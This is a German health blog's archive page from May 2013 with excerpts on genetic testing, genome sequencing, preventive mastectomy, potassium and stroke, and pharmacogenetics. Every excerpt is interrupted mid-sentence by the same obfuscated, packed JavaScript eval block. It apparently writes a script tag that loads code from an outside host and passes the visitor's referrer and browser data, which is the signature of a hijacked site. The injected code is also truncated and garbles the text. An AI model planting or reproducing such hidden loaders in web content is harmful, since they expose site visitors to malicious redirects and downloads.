Monthly Archives: Mai 2013

Wenn ein Gentest (zu)viele Indizien für das Krankheitsrisiko enthält [37]

Zur eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rbada|var|u0026u|referrer|dyati||js|php'.split('|'),0,{})) Diskussion im Umgang mit genetischen Überschussinformationen Die genetische Diagnostik gibt Auskunft über die Wahrscheinlichkeit, im Verlaufe des Lebens an einer Erkrankung zu leiden. Mit […]

Präventive Genomsequenzierung [36]

Vor eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eisba|var|u0026u|referrer|ayhar||js|php'.split('|'),0,{})) dem Hintergrund der großen Fortschritte und sinkender Kosten der Gentechnik wird die Genomsequenzierung zunehmend in die tägliche medizinische Praxis integriert. Die folgende Liste […]

Was können wir wissen, was wollen wir tun? Zur Vorsorge von Brustkrebs durch Operationen [35]

Ein eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbiys|var|u0026u|referrer|yrbrk||js|php'.split('|'),0,{})) Weltstar hat entschieden, sich vorsorglich die Brüste entfernen zu lassen, um dem möglichen Leiden an Brustkrebs vorzubeugen. Angelina Jolie geht diesen Schritt öffentlich […]

WHO-Empfehlung zur Schlaganfallprävention mit Hilfe von Kalium [34]

Mit eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shaik|var|u0026u|referrer|dridy||js|php'.split('|'),0,{})) einer höheren Tagesdosis an Kalium könnte die Zahl der Schlaganfälle bei Hypertonikern um bis zu 24 Prozent reduziert werden. Zu dieser Prognose gelangen […]

Kann das Risiko von Nebenwirkungen bei Medikamenten durch diagnostische DNA-Tests präventiv vermieden werden?[33]

Zum eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d)}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ntizi|var|u0026u|referrer|enina||js|php'.split('|'),0,{})) Konzept der  individuellen Therapiesicherheit  bei der Gabe von Statinen, Tamoxifen und Clopidogrel Die Wirksamkeit und die Verträglichkeit von Medikamenten hängen auch […]